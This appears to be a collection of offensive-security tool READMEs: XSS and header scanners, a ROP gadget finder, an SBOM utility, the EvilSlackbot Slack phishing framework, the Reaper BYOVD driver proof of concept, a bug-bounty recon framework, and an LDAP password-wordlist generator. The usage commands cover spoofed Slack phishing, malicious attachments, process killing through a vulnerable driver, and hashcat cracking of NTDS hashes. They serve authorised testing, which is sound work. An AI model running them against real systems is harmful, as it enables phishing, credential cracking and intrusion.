X-Recon - A Utility For Detecting Webpage Inputs And Conducting XSS Scans

By: Zion3R

A utility for identifying web page inputs and conducting XSS scanning.


Features:

  • Subdomain Discovery: Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.

  • Site-wide Link Discovery: Collects all links throughout the website based on the provided whitelist and the specified max_depth.

  • Form and Input Extraction: Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for the tool's XSS scanning capability (a minimal extraction sketch follows this list).

  • XSS Scanning: Once the recon step returns the custom JSON containing the extracted entries, X-Recon can initiate the XSS vulnerability testing process and report the results.
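As a concrete illustration of the form-and-input extraction step, the core of such a crawler is parsing each page for form and input elements and serializing them to JSON. A minimal sketch using requests and BeautifulSoup (illustrative only, not X-Recon's actual code):

```python
# Minimal sketch of form/input extraction; illustrative only -- this is not
# X-Recon's actual code. Requires: pip install requests beautifulsoup4
import json
import requests
from bs4 import BeautifulSoup

def extract_forms(url: str) -> list[dict]:
    soup = BeautifulSoup(requests.get(url, timeout=10).text, "html.parser")
    forms = []
    for form in soup.find_all("form"):
        forms.append({
            "action": form.get("action", ""),
            "method": form.get("method", "get"),
            # Each named input is a candidate XSS injection point.
            "inputs": [inp.get("name") for inp in form.find_all("input") if inp.get("name")],
        })
    return forms

print(json.dumps(extract_forms("http://testphp.vulnweb.com"), indent=2))
```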



Note:

The scanning functionality does not currently work on SPA (Single Page Application) web applications; the tool has only been tested on websites built with PHP, where it yielded strong results. SPA support is planned for a future release.




Note:

This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list covers common static file types (".css", ".js", ".mp4", ".zip", ".png", ".svg", ".jpeg", ".webp", ".jpg", ".gif"). You can customize this list to better suit your needs by editing the setting.json file.
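In practice this skip list is just a suffix check applied to every candidate URL before it is crawled. A minimal sketch of that check (the exact schema of setting.json is not documented here, so the constant below is an assumption):

```python
# Minimal sketch of the extension skip check. The tuple mirrors the default
# list quoted above; setting.json's exact schema is an assumption here.
SKIP_EXTENSIONS = (".css", ".js", ".mp4", ".zip", ".png", ".svg",
                   ".jpeg", ".webp", ".jpg", ".gif")

def should_crawl(url: str) -> bool:
    # Skip static assets so the crawler spends its time on pages with inputs.
    return not url.lower().endswith(SKIP_EXTENSIONS)
```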

Installation

$ git clone https://github.com/joshkar/X-Recon
$ cd X-Recon
$ python3 -m pip install -r requirements.txt
$ python3 xr.py

Test Target:

You can use the following address in the Get URL section:

  http://testphp.vulnweb.com


ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

By: Zion3R


ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


Features

  • Identifies potential ROP gadgets in binary executables.
  • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
  • Generates exploit templates to speed up exploit development.
  • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
  • Can print function names and addresses for further analysis.
  • Supports searching for specific instruction patterns.

Usage

  • <binary>: Path to the binary file for analysis.
  • -s, --search SEARCH: Optional. Search for specific instruction patterns.
  • -f, --functions: Optional. Print function names and addresses.

Examples

  • Analyze a binary without searching for specific instructions:

python3 ropdump.py /path/to/binary

  • Analyze a binary and search for specific instructions:

python3 ropdump.py /path/to/binary -s "pop eax"

  • Analyze a binary and print function names and addresses:

python3 ropdump.py /path/to/binary -f
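For intuition, ROP gadget discovery generally boils down to locating ret opcodes and disassembling the bytes immediately before them. A minimal sketch using the Capstone disassembler (illustrative only, not ROPDump's actual implementation; assumes raw 32-bit x86 machine code such as a dumped .text section):

```python
# Minimal ROP-gadget sketch using the Capstone disassembler. Illustrative
# only -- not ROPDump's actual implementation. Assumes `code` holds raw
# 32-bit x86 machine code (e.g. a dumped .text section).
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def find_gadgets(code: bytes, base: int, window: int = 12) -> list[tuple[int, str]]:
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    gadgets = []
    for i, byte in enumerate(code):
        if byte != 0xC3:  # 0xC3 is the x86 `ret` opcode that terminates a gadget
            continue
        for start in range(max(0, i - window), i + 1):
            insns = list(md.disasm(code[start:i + 1], base + start))
            # Keep the window only if it disassembles cleanly through the ret.
            if insns and insns[-1].mnemonic == "ret" \
                    and insns[-1].address + insns[-1].size == base + i + 1:
                text = "; ".join(f"{x.mnemonic} {x.op_str}".strip() for x in insns)
                gadgets.append((base + start, text))
                break  # longest clean window found; move on to the next ret
    return gadgets

# Example: find_gadgets(open("text_section.bin", "rb").read(), 0x08048000)
```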



Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions

By: Zion3R


This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.

The process and objective are simple: get a clear view of the packages installed by APT (support for RPM and other package managers is in progress). This is mainly needed to check which of the installed packages are actually being executed.


Installation

The packages needed are mentioned in the requirements.txt file and can be installed using pip:

pip3 install -r requirements.txt

Usage

  • First of all, install the packages.
  • Secondly, set up the environment, e.g.:
    • Mount the image: I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes, but that is still quite a task.
  • Finally, run the tool to list all the packages.

Argument Description
--analysis-mode Specifies the mode of operation. Default is static. Choices are static and chroot.
--static-type Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
--volume-path Specifies the path to the mounted volume. Default is /mnt.
--save-file Specifies the output file for JSON output.
--info-graphic Specifies whether to generate visual plots for CHROOT analysis. Default is True.
--pkg-mgr Manually specify the package manager, or omit this option for automatic detection.
APT:
- Static Info Analysis:
- This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
- It analyzes the packages installed on the mounted volume located at /mnt.
- It saves the output in a JSON file named output.json.
- It generates visual plots for CHROOT analysis.
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
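For intuition, the Info Directory method above conceptually amounts to reading the dpkg info database on the mounted volume and mapping each package to the files (and executables) it installed. A minimal sketch (illustrative only, not this tool's actual code; assumes a Debian-style /var/lib/dpkg/info layout under the mount point):

```python
# Minimal sketch of APT "info directory" analysis on a mounted volume.
# Illustrative only -- not Startup-SBOM's actual code. Assumes a Debian-style
# /var/lib/dpkg/info layout under the mount point.
import json
from pathlib import Path

def list_apt_packages(volume: str = "/mnt") -> dict[str, list[str]]:
    info_dir = Path(volume) / "var/lib/dpkg/info"
    packages = {}
    for list_file in info_dir.glob("*.list"):
        pkg = list_file.stem
        files = list_file.read_text(errors="ignore").splitlines()
        # Heuristic: files under bin/ or sbin/ are the package's executables.
        executables = [f for f in files if "/bin/" in f or "/sbin/" in f]
        packages[pkg] = executables
    return packages

print(json.dumps(list_apt_packages("/mnt"), indent=2))
```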
  • Static Service Analysis:

  • This command runs the program in static analysis mode, specifically using the Service file analysis method.
  • It analyzes the packages installed on the mounted volume located at /custom_mount.
  • It saves the output in a JSON file named output.json.
  • It does not generate visual plots for CHROOT analysis.
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
```

  • Chroot analysis with or without graphic output:

  • This command runs the program in chroot analysis mode.
  • It analyzes the packages installed on the mounted volume located at /mnt.
  • It saves the output in a JSON file named output.json.
  • It generates visual plots for CHROOT analysis.
  • For graphical output keep --info-graphic as True, else False.
```bash
python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```

RPM - Static Analysis:
  • Similar to how it's done on APT, but there is only one type of static scan available for now.
```bash
python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
```

  • Chroot analysis with or without graphic output:
  • Exactly how it's done on APT.
```bash
python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```

Supporting Images

Currently the tool works on Debian- and Red Hat-based images. I can guarantee the Debian outputs, but the Red Hat ones still need work; they are not perfect yet.

I am working on the pacman side of things, trying to find a reliable way of accessing the pacman database for static analysis.

Graphical Output Images (Chroot)

APT Chroot

RPM Chroot

Inner Workings

For the workings and process related documentation please read the wiki page: Link

TODO

  • [x] Support for RPM
  • [x] Support for APT
  • [x] Support for Chroot Analysis
  • [x] Support for Versions
  • [x] Support for Chroot Graphical output
  • [x] Support for organized graphical output
  • [ ] Support for Pacman

Ideas and Discussions

Ideas regarding this topic are welcome in the discussions page.



EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

By: Zion3R

EvilSlackbot

A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

Disclaimer

This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


Background

Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually granted permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an API token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.

Phishing Simulations

In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (links, files, spoofed messages).

Installation

EvilSlackbot requires Python 3 and the slackclient library:

pip3 install slackclient

Usage

usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

options:
-h, --help show this help message and exit

Required:
-t TOKEN, --token TOKEN
Slack Oauth token

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels

Token

To use this tool, you must provide an xoxb or xoxp token.

Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>

Attacks

Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

-s, --search Search slack for secrets with a keyword

-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

Spoofed messages (-sP)

With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
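Under the hood, this attack reduces to two Slack Web API calls: resolve the email to a user ID, then post a message with a custom name and icon. A minimal sketch using the slackclient package from the install step (illustrative only, not EvilSlackbot's actual code; the display name and icon URL are hypothetical and require the chat:write.customize scope):

```python
# Minimal sketch of the email -> Slack ID lookup plus a spoofed message,
# using the slackclient package from the install step. Illustrative only --
# not EvilSlackbot's actual code. The display name and icon URL below are
# hypothetical and require the chat:write.customize bot scope.
from slack import WebClient

client = WebClient(token="xoxb-...")  # the token passed via -t in the real tool

# Resolve the target's email address to their Slack user ID.
user = client.users_lookupByEmail(email="target@example.com")
user_id = user["user"]["id"]

# Posting to a user ID opens a DM; username/icon_url spoof the sender.
client.chat_postMessage(
    channel=user_id,
    text="Please re-authenticate: https://example.com/login",
    username="IT Helpdesk",
    icon_url="https://example.com/helpdesk.png",
)
```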

Phishing Messages (-m)

With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

Secret Search (-s)

With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires an xoxp token, as xoxb tokens cannot be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

Attachments (-a)

With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

Arguments

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels

Channel Search

With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

python3 EvilSlackbot.py -t <xoxb token> -cL


Reaper - Proof Of Concept On BYOVD Attack

By: Zion3R


Reaper is a proof-of-concept for a BYOVD (Bring Your Own Vulnerable Driver) attack. This malicious technique involves loading a legitimate but vulnerable driver onto a target system, which allows attackers to exploit the driver to perform malicious actions.

Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

Note: Reaper does not kill the Windows Defender process, as it is protected; Reaper is a simple proof of concept.


Features

  • Kill process
  • Suspend process

Help

    ____
   / __ \___  ____ _____  ___  _____
  / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
 / _, _/  __/ /_/ / /_/ /  __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
                /_/

[Coded by MrEmpy]
[v1.0]

Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process

Values:
PROCESSID process id to suspend/kill

Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337

Demonstration

Install

You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

Note: The executable and driver must be in the same directory.



Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

By: Zion3R



Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make 💰 doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high-paying career in Cyber Security.

In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific pattern for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


Quick Start

Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh

Download Latest Stable ALPHA Version

wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz

Install

The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.4. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.

./install.sh

This video shows exactly what to expect from a successful installation.

If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

./install.sh --arm

You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

Run the Web Application (Client and Server)

Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not to run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directory and run the run.sh bash script.

./run.sh

If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

./run.sh --arm

Core Modules

The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

Wildfire

At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

How it works:

  1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
  2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
  3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.

Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

Also, please note that most data will not show in the GUI until the scan has completed. It's best to run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from Recon to Enumeration.
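Conceptually, the scheduling in step 2 above is an oldest-first sort over last-scanned timestamps. A minimal sketch (the record shape here is an assumption for illustration, not the framework's actual data model):

```python
# Minimal sketch of Wildfire's oldest-first ordering (step 2 above).
# Illustrative only -- the {"domain", "last_scanned"} record shape is an
# assumption, not the framework's actual data model.
from datetime import datetime

targets = [
    {"domain": "a.example.com", "last_scanned": datetime(2024, 5, 1)},
    {"domain": "b.example.com", "last_scanned": datetime(2024, 3, 12)},
    {"domain": "c.example.com", "last_scanned": datetime(2024, 4, 20)},
]

# Stalest data first, so the domain scanned longest ago is rescanned first.
for target in sorted(targets, key=lambda t: t["last_scanned"]):
    print("scanning", target["domain"])
```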

Running Wildfire:

Graphical User Interface (GUI)

Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan from the CLI.

Command Line Interface (CLI)

All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

python3 wildfire.py --start --cloud --scan

Slowburn

Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and deposits it into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

To initialize Slowburn, simply run the following command:

python3 slowburn.py --initialize

Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

python3 slowburn.py

Sub-Modules

The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

Fire-Starter

Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and ASNs to identify where those external entries are hosted. Currently, Fire-Starter chains together the following widely used open-source tools:

  • Amass
  • Sublist3r
  • Assetfinder
  • Get All URLs (GAU)
  • Certificate Transparency Logs (CRT)
  • Subfinder
  • ShuffleDNS
  • GoSpider
  • Subdomainizer

These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

Once the scan is complete, the Dashboard will be updated and available to the user.

Most Sub-Modules in The Ars0n Framework require the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
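Conceptually, chaining subdomain tools like these is subprocess orchestration plus deduplication. A minimal sketch (illustrative only, not Fire-Starter's actual code; assumes the amass and subfinder binaries are on PATH):

```python
# Minimal sketch of chaining two subdomain tools and merging their output.
# Illustrative only -- not Fire-Starter's actual code; assumes the amass
# and subfinder binaries are installed and on PATH.
import subprocess

def enumerate_subdomains(domain: str) -> set[str]:
    commands = [
        ["amass", "enum", "-passive", "-d", domain],
        ["subfinder", "-silent", "-d", domain],
    ]
    found: set[str] = set()
    for cmd in commands:
        out = subprocess.run(cmd, capture_output=True, text=True)
        # Each tool prints one subdomain per line; merge and dedupe.
        found.update(line.strip() for line in out.stdout.splitlines() if line.strip())
    return found

print(sorted(enumerate_subdomains("example.com")))
```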

Fire-Cloud

Coming soon...

Fire-Scanner

Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

Troubleshooting

The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can experience unexpected behavior if conflicts emerge with any existing service or tool running on the user's system. This complexity is the reason why The Ars0n Framework should only be run on a clean installation of Kali Linux.

Another very common issue is caused by MongoDB not successfully installing and/or running on the user's machine. The most common manifestation of this issue is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.

Frequently Asked Questions

Coming soon...



Headerpwn - A Fuzzer For Finding Anomalies And Analyzing How Servers Respond To Different HTTP Headers

By: Zion3R

Install

To install headerpwn, run the following command:

go install github.com/devanshbatham/headerpwn@v0.0.3

Usage

headerpwn allows you to test various headers on a target URL and analyze the responses. Here's how to use the tool:

  1. Provide the target URL using the -url flag.
  2. Create a file containing the headers you want to test, one header per line. Use the -headers flag to specify the path to this file.

Example usage:

headerpwn -url https://example.com -headers my_headers.txt
  • The format of my_headers.txt should look like this:
Proxy-Authenticate: foobar
Proxy-Authentication-Required: foobar
Proxy-Authorization: foobar
Proxy-Connection: foobar
Proxy-Host: foobar
Proxy-Http: foobar
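Conceptually, header fuzzing of this kind sends one request per candidate header and flags responses that deviate from a baseline. A minimal Python sketch of the idea (headerpwn itself is written in Go; this is illustrative, not its actual implementation):

```python
# Minimal sketch of the header-fuzzing idea: send one request per candidate
# header and flag responses that differ from a baseline. Illustrative only --
# not headerpwn's actual (Go) implementation.
import requests

url = "https://example.com"
baseline = requests.get(url).status_code

for line in open("my_headers.txt"):
    if ":" not in line:
        continue
    name, value = line.strip().split(":", 1)
    resp = requests.get(url, headers={name: value.strip()})
    if resp.status_code != baseline:  # an anomaly worth a closer look
        print(f"{name}: {resp.status_code} (baseline {baseline})")
```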

Proxying requests through Burp Suite:

Follow these steps to proxy requests through Burp Suite:

  • Export Burp's Certificate:

    • In Burp Suite, go to the "Proxy" tab.
    • Under the "Proxy Listeners" section, select the listener that is configured for 127.0.0.1:8080
    • Click on the "Import/ Export CA Certificate" button.
    • In the certificate window, click "Export Certificate" and save the certificate file (e.g., burp.der).
  • Install Burp's Certificate:

    • Install the exported certificate as a trusted certificate on your system. How you do this depends on your operating system.
    • On Windows, you can double-click the .cer file and follow the prompts to install it in the "Trusted Root Certification Authorities" store.
    • On macOS, you can double-click the .cer file and add it to the "Keychain Access" application in the "System" keychain.
    • On Linux, you might need to copy the certificate to a trusted certificate location and configure your system to trust it.

You should be all set:

headerpwn -url https://example.com -headers my_headers.txt -proxy 127.0.0.1:8080

Credits

The headers.txt file is compiled from various sources, including the SecLists project. These headers are used for testing purposes and provide a variety of scenarios for analyzing how servers respond to different headers.



LDAPWordlistHarvester - A Tool To Generate A Wordlist From The Information Present In LDAP, In Order To Crack Passwords Of Domain Accounts

By: Zion3R


A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.


Features

The bigger the domain is, the better the wordlist will be.

  • [x] Creates a wordlist based on the following information found in the LDAP:
  • [x] User: name and sAMAccountName
  • [x] Computer: name and sAMAccountName
  • [x] Groups: name
  • [x] Organizational Units: name
  • [x] Active Directory Sites: name and descriptions
  • [x] All LDAP objects: descriptions
  • [x] Choose wordlist output file name with option --outputfile

Demonstration

To generate a wordlist from the LDAP of the domain domain.local you can use this command:

./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101

You will get the following output if using the Python version:

You will get the following output if using the Powershell version:
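Conceptually, the harvest is a handful of LDAP searches that pull name, sAMAccountName, and description attributes and split them into words. A minimal sketch with the ldap3 library (illustrative only, not the tool's actual code; server, credentials, and base DN are placeholders taken from the demonstration above):

```python
# Minimal sketch of harvesting wordlist candidates over LDAP with the ldap3
# library. Illustrative only -- not LDAPWordlistHarvester's actual code.
# Server, credentials, and base DN are placeholders from the demo above.
from ldap3 import Server, Connection, ALL, SUBTREE

server = Server("192.168.1.101", get_info=ALL)
conn = Connection(server, user="domain.local\\Administrator",
                  password="P@ssw0rd123!", authentication="NTLM")
conn.bind()

conn.search("DC=domain,DC=local", "(objectClass=*)", search_scope=SUBTREE,
            attributes=["name", "sAMAccountName", "description"])

words = set()
for entry in conn.entries:
    for attr in ("name", "sAMAccountName", "description"):
        if attr in entry.entry_attributes:      # attribute may be absent
            for value in entry[attr].values:    # attributes can be multi-valued
                words.update(str(value).split())

with open("wordlist.txt", "w") as f:
    f.write("\n".join(sorted(words)))
```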


Cracking passwords

Once you have this wordlist, you should crack your NTDS using hashcat, --loopback and the rule clem9669_large.rule.

./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback

Usage

$ ./LDAPWordlistHarvester.py -h
LDAPWordlistHarvester.py v1.1 - by @podalirius_

usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

options:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
-o OUTPUTFILE, --outputfile OUTPUTFILE
Path to output file of wordlist.

Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with
--ldaps Use LDAPS instead of LDAP

Credentials:
--no-pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate with
